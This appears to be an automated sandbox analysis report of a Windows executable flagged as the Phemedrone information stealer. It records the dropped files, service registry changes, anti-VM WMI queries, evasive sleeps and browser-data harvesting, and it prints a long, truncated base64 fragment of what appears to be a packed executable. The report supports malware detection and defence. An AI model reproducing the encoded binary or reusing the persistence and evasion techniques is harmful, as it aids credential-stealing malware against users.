Edit tour

Windows Analysis Report
0nEuHt4Yr4.exe

Overview

General Information

Sample Name:	0nEuHt4Yr4.exe
Original Sample Name:	ccec9f6516e38c852b1df13c836e5430.exe
Analysis ID:	1319631
MD5:	ccec9f6516e38c852b1df13c836e5430
SHA1:	30e3c298370f32e92d42f586e170996229db8fab
SHA256:	e5e92ec5d1d5be22b05694956de0321475105789279acbc9e83d7796026ec385
Tags:	32exetrojan
Infos:

Detection

Phemedrone Stealer

Score:	87
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Telegram Recon

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Yara detected Phemedrone Stealer

Drops executable to a common third party application directory

Machine Learning detection for sample

May check the online IP address of the machine

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

.NET source code contains very large strings

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Drops PE files to the application program directory (C:\ProgramData)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Detected potential crypto function

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Modifies existing windows services

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Allocates memory with a write watch (potentially for evading sandboxes)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates or modifies windows services

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

0nEuHt4Yr4.exe (PID: 7556 cmdline: C:\Users\user\Desktop\0nEuHt4Yr4.exe MD5: CCEC9F6516E38C852B1DF13C836E5430)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

N6MONYKO.exe (PID: 7660 cmdline: "C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe" MD5: 0DF3A35807F6A4F361D03C4D66B915E2)

2JRUV92E.exe (PID: 7680 cmdline: "C:\ProgramData\USOShared\2JRUV92E.exe" MD5: E025C7BFA143C476A648E9DAA3CFDA2F)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\USOShared\2JRUV92E.exe	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
C:\ProgramData\USOShared\2JRUV92E.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\ProgramData\USOShared\2JRUV92E.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
Process Memory Space: 0nEuHt4Yr4.exe PID: 7556	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
Process Memory Space: 2JRUV92E.exe PID: 7680	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.0nEuHt4Yr4.exe.148b8290.1.raw.unpack	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
0.2.0nEuHt4Yr4.exe.148b8290.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.0nEuHt4Yr4.exe.148b8290.1.unpack	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
3.0.2JRUV92E.exe.6e0000.0.unpack	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
3.0.2JRUV92E.exe.6e0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.0nEuHt4Yr4.exe.1464e398.2.raw.unpack	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
0.2.0nEuHt4Yr4.exe.1464e398.2.unpack	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
Click to see the 2 entries

Base64 encoded string: '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

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{3EBE6875-9C4E-4782-8A43-275AFFFCA6FB}
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Mutant created: \Sessions\1\BaseNamedObjects\WAM.log
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\17984755fe166b7170b9b5099053521c
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\359dca4322b8b4a0f7f92bf448150fb
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\_MSIExecute
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_01

Source: 2JRUV92E.exe.0.dr, PBE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.0nEuHt4Yr4.exe.148b8290.1.raw.unpack, PBE.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Automated click: OK
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 0nEuHt4Yr4.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 0nEuHt4Yr4.exe

Static file information: File size 6999552 > 1048576

Source: 0nEuHt4Yr4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0nEuHt4Yr4.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x6a8400

Source: 0nEuHt4Yr4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: N6MONYKO.exe.0.dr	Static PE information: real checksum: 0x26c7bf should be: 0x271937
Source: 2JRUV92E.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x173a4

Source: 0nEuHt4Yr4.exe

Static PE information: 0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe

File written: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe

Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe

File created: C:\ProgramData\USOShared\2JRUV92E.exe

Jump to dropped file

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	File created: C:\ProgramData\USOShared\2JRUV92E.exe			Jump to dropped file
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	File created: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe			Jump to dropped file

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe

File created: C:\ProgramData\Start Menu\3SOTXG4A.exe

Jump to behavior

Source: C:\ProgramData\USOShared\2JRUV92E.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage

Jump to behavior

Source: C:\ProgramData\USOShared\2JRUV92E.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage

Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\USOShared\2JRUV92E.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\ProgramData\USOShared\2JRUV92E.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe TID: 7620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe TID: 7716	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe TID: 7944	Thread sleep time: -227550s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe TID: 7952	Thread sleep time: -68500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe TID: 7952	Thread sleep time: -65500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe TID: 7944	Thread sleep time: -194950s >= -30000s	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe TID: 8044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe TID: 7812	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe TID: 7740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe TID: 8044	Thread sleep time: -600000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Window / User API: threadDelayed 4551			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Window / User API: threadDelayed 3899			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Memory allocated: 5700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Memory allocated: 5850000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Memory allocated: 5CC0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Memory allocated: 5CE0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Memory allocated: 5F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Memory allocated: 6010000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\USOShared\2JRUV92E.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\USOShared\2JRUV92E.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\ProgramData\USOShared\2JRUV92E.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Thread delayed: delay time: 600000	Jump to behavior

